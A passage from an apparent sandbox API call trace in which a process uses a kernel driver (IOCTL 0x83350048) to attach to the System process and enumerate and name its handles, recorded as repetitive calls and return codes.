ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.111] ObReferenceObjectByHandle (in: Handle=0xffffffff80000a7c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a7469e0, HandleInformation=0x0) returned 0x0 [0258.111] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.111] PsReleaseProcessExitSynchronization () returned 0x2 [0258.111] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa03 [0258.111] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a9af044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a9af044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0258.111] ObfDereferenceObject (Object=0xffffe0006a7469e0) returned 0x7ffe [0258.111] IoCompleteRequest () returned 0x0 [0258.111] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x5e, lpOverlapped=0x0) returned 1 [0258.111] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.111] PsAcquireProcessExitSynchronization () returned 0x0 [0258.111] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.111] ObReferenceObjectByHandle (in: Handle=0xffffffff80000a84, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a7459e0, HandleInformation=0x0) returned 0x0 [0258.111] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.111] PsReleaseProcessExitSynchronization () returned 0x2 [0258.111] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa02 [0258.111] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a610704, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a610704, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0258.111] ObfDereferenceObject (Object=0xffffe0006a7459e0) returned 0x7ff5 [0258.111] IoCompleteRequest () returned 0x0 [0258.111] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x68, lpOverlapped=0x0) returned 1 [0258.111] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.111] PsAcquireProcessExitSynchronization () returned 0x0 [0258.111] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.112] ObReferenceObjectByHandle (in: Handle=0xffffffff80000a8c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a816ac0, HandleInformation=0x0) returned 0x0 [0258.112] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.112] PsReleaseProcessExitSynchronization () returned 0x2 [0258.112] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa01 [0258.112] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a70c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a70c7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0258.112] ObfDereferenceObject (Object=0xffffe0006a816ac0) returned 0x7ffd [0258.112] IoCompleteRequest () returned 0x0 [0258.112] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x64, lpOverlapped=0x0) returned 1 [0258.112] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.112] PsAcquireProcessExitSynchronization () returned 0x0 [0258.112] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.112] ObReferenceObjectByHandle (in: Handle=0xffffffff80000a94, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a4a5f20, HandleInformation=0x0) returned 0x0 [0258.112] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.112] PsReleaseProcessExitSynchronization () returned 0x2 [0258.112] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2fa00 [0258.112] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006904d7c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006904d7c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0258.112] ObfDereferenceObject (Object=0xffffe0006a4a5f20) returned 0x800f [0258.112] IoCompleteRequest () returned 0x0 [0258.112] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x3c, lpOverlapped=0x0) returned 1 [0258.112] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.112] PsAcquireProcessExitSynchronization () returned 0x0 [0258.112] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.112] ObReferenceObjectByHandle (in: Handle=0xffffffff80000a9c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a4a5a20, HandleInformation=0x0) returned 0x0 [0258.112] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.112] PsReleaseProcessExitSynchronization () returned 0x2 [0258.112] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9ff [0258.112] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0258.112] ObfDereferenceObject (Object=0xffffe0006a4a5a20) returned 0x7fff [0258.112] IoCompleteRequest () returned 0x0 [0258.112] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x72, lpOverlapped=0x0) returned 1 [0258.112] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.112] PsAcquireProcessExitSynchronization () returned 0x0 [0258.112] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.112] ObReferenceObjectByHandle (in: Handle=0xffffffff80000aa4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a747a80, HandleInformation=0x0) returned 0x0 [0258.112] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.112] PsReleaseProcessExitSynchronization () returned 0x2 [0258.113] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9fe [0258.113] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0258.113] ObfDereferenceObject (Object=0xffffe0006a747a80) returned 0x7e2a [0258.113] IoCompleteRequest () returned 0x0 [0258.113] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpOutBuffer=0x315480, lpBytesReturned=0x14d450, lpOverlapped=0x0) returned 0 [0258.113] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.113] PsAcquireProcessExitSynchronization () returned 0x0 [0258.113] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.113] ObReferenceObjectByHandle (in: Handle=0xffffffff80000aa8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.113] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.113] PsReleaseProcessExitSynchronization () returned 0x2 [0258.113] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9fd [0258.113] IoCompleteRequest () returned 0x0 [0258.113] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x20, lpOverlapped=0x0) returned 1 [0258.113] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.113] PsAcquireProcessExitSynchronization () returned 0x0 [0258.113] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.113] ObReferenceObjectByHandle (in: Handle=0xffffffff80000ac0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006903a370, HandleInformation=0x0) returned 0x0 [0258.113] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.113] PsReleaseProcessExitSynchronization () returned 0x2 [0258.113] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9fc [0258.113] ObQueryNameString (in: Object=0xffffe0006903a370, ObjectNameInfo=0xffffe0006a6fa7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a6fa7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.113] ObfDereferenceObject (Object=0xffffe0006903a370) returned 0x8000 [0258.113] IoCompleteRequest () returned 0x0 [0258.113] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x20, lpOverlapped=0x0) returned 1 [0258.113] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.113] PsAcquireProcessExitSynchronization () returned 0x0 [0258.113] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.113] ObReferenceObjectByHandle (in: Handle=0xffffffff80000acc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069f45b10, HandleInformation=0x0) returned 0x0 [0258.113] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.113] PsReleaseProcessExitSynchronization () returned 0x2 [0258.113] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9fb [0258.113] ObQueryNameString (in: Object=0xffffe00069f45b10, ObjectNameInfo=0xffffe0006a6a57c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a6a57c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.113] ObfDereferenceObject (Object=0xffffe00069f45b10) returned 0x8000 [0258.114] IoCompleteRequest () returned 0x0 [0258.114] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x1e6, lpOverlapped=0x0) returned 1 [0258.114] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.114] PsAcquireProcessExitSynchronization () returned 0x0 [0258.114] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.114] ObReferenceObjectByHandle (in: Handle=0xffffffff80000b08, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a03ccf0, HandleInformation=0x0) returned 0x0 [0258.114] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.114] PsReleaseProcessExitSynchronization () returned 0x2 [0258.114] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9fa [0258.114] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4397c4, Length=0x800, ReturnLength=0xffffd000b1b8e338 | out: ObjectNameInfo=0xffffe0006a4397c4, ReturnLength=0xffffd000b1b8e338) returned 0x0 [0258.114] ObfDereferenceObject (Object=0xffffe0006a03ccf0) returned 0x7f3e [0258.114] IoCompleteRequest () returned 0x0 [0258.114] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x2c, lpOverlapped=0x0) returned 1 [0258.114] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.114] PsAcquireProcessExitSynchronization () returned 0x0 [0258.114] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.114] ObReferenceObjectByHandle (in: Handle=0xffffffff80000b20, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069decb70, HandleInformation=0x0) returned 0x0 [0258.114] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.114] PsReleaseProcessExitSynchronization () returned 0x2 [0258.114] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9f9 [0258.114] ObQueryNameString (in: Object=0xffffe00069decb70, ObjectNameInfo=0xffffe000690ef044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000690ef044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.114] ObfDereferenceObject (Object=0xffffe00069decb70) returned 0x8000 [0258.114] IoCompleteRequest () returned 0x0 [0258.114] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x20, lpOverlapped=0x0) returned 1 [0258.114] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.114] PsAcquireProcessExitSynchronization () returned 0x0 [0258.114] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.114] ObReferenceObjectByHandle (in: Handle=0xffffffff80000b28, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a663570, HandleInformation=0x0) returned 0x0 [0258.114] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.114] PsReleaseProcessExitSynchronization () returned 0x2 [0258.114] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9f8 [0258.114] ObQueryNameString (in: Object=0xffffe0006a663570, ObjectNameInfo=0xffffe0006914d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006914d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.114] ObfDereferenceObject (Object=0xffffe0006a663570) returned 0x8000 [0258.114] IoCompleteRequest () returned 0x0 [0258.115] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpOutBuffer=0x315480, lpBytesReturned=0x14d450, lpOverlapped=0x0) returned 0 [0258.115] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.115] PsAcquireProcessExitSynchronization () returned 0x0 [0258.115] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.115] ObReferenceObjectByHandle (in: Handle=0xffffffff80000b2c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.115] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.115] PsReleaseProcessExitSynchronization () returned 0x2 [0258.115] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9f7 [0258.115] IoCompleteRequest () returned 0x0 [0258.115] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpOutBuffer=0x315480, lpBytesReturned=0x14d450, lpOverlapped=0x0) returned 0 [0258.115] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.115] PsAcquireProcessExitSynchronization () returned 0x0 [0258.115] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.115] ObReferenceObjectByHandle (in: Handle=0xffffffff80000b3c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.115] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.115] PsReleaseProcessExitSynchronization () returned 0x2 [0258.115] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9f6 [0258.115] IoCompleteRequest () returned 0x0 [0258.115] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpOutBuffer=0x315480, lpBytesReturned=0x14d450, lpOverlapped=0x0) returned 0 [0258.115] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.115] PsAcquireProcessExitSynchronization () returned 0x0 [0258.115] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.115] ObReferenceObjectByHandle (in: Handle=0xffffffff80000b44, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.115] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.115] PsReleaseProcessExitSynchronization () returned 0x2 [0258.115] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9f5 [0258.115] IoCompleteRequest () returned 0x0 [0258.115] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpOutBuffer=0x315480, lpBytesReturned=0x14d450, lpOverlapped=0x0) returned 0 [0258.115] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.115] PsAcquireProcessExitSynchronization () returned 0x0 [0258.115] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.115] ObReferenceObjectByHandle (in: Handle=0xffffffff80000b54, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.115] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.116] PsReleaseProcessExitSynchronization () returned 0x2 [0258.116] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9f4 [0258.116] IoCompleteRequest () returned 0x0 [0258.116] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x20, lpOverlapped=0x0) returned 1 [0258.116] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.116] PsAcquireProcessExitSynchronization () returned 0x0 [0258.116] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.116] ObReferenceObjectByHandle (in: Handle=0xffffffff80000b60, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a8957b0, HandleInformation=0x0) returned 0x0 [0258.116] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.116] PsReleaseProcessExitSynchronization () returned 0x2 [0258.116] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9f3 [0258.116] ObQueryNameString (in: Object=0xffffe0006a8957b0, ObjectNameInfo=0xffffe0006a2a6044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a2a6044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.116] ObfDereferenceObject (Object=0xffffe0006a8957b0) returned 0x8000 [0258.116] IoCompleteRequest () returned 0x0 [0258.116] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpOutBuffer=0x315480, lpBytesReturned=0x14d450, lpOverlapped=0x0) returned 0 [0258.116] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.116] PsAcquireProcessExitSynchronization () returned 0x0 [0258.116] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.116] ObReferenceObjectByHandle (in: Handle=0xffffffff80000b70, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.116] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.116] PsReleaseProcessExitSynchronization () returned 0x2 [0258.116] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9f2 [0258.116] IoCompleteRequest () returned 0x0 [0258.116] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8*, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpInBuffer=0x14d4c8*, lpOutBuffer=0x315480*, lpBytesReturned=0x14d450*=0x7e, lpOverlapped=0x0) returned 1 [0258.116] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.116] PsAcquireProcessExitSynchronization () returned 0x0 [0258.116] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.116] ObReferenceObjectByHandle (in: Handle=0xffffffff80000b74, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000691274e0, HandleInformation=0x0) returned 0x0 [0258.116] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.116] PsReleaseProcessExitSynchronization () returned 0x2 [0258.116] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f9f1 [0258.116] ObQueryNameString (in: Object=0xffffe000691274e0, ObjectNameInfo=0xffffe0006a7aa7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a7aa7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.116] ObfDereferenceObject (Object=0xffffe000691274e0) returned 0x8000 [0258.116] IoCompleteRequest () returned 0x0 [0258.117] DeviceIoControl (in: hDevice=0x164, dwIoControlCode=0x83350048, lpInBuffer=0x14d4c8, nInBufferSize=0x20, lpOutBuffer=0x315480, nOutBufferSize=0x808, lpBytesReturned=0x14d450, lpOverlapped=0x0 | out: lpOutBuffer=0x315480, lpBytesReturned=0x14d450, lpOverlapped=0x0) returned 0 [0258.117] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.117] PsAcquireProcessExitSynchronization () returned 0x0 [0258.117] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.117] ObReferenceObjectByHandle (in: Handle=0xffffffff80000b7c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, 